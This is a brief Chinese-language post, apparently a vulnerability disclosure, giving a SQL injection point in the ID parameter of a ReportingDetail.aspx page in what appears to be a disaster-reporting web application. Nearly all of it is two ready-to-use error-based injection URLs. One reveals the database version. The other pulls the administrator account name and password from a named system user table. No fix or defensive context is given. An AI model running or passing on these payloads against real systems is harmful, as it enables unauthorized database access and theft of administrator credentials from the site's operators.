```
注入链接:/Disaster/Reporting/ReportingDetail.aspx
注入参数:ID
【获取数据库版本】
/Disaster/Reporting/ReportingDetail.aspx?ID=1' AND 3=CHAR(@@version) --
【管理员账号密码】
/Disaster/Reporting/ReportingDetail.aspx?ID=1' AND+2709=((select+top+1+UserID%2b'---'%2bUserPwd+from+strongmain.dbo.Web_SystemUser))--
```


暂无评论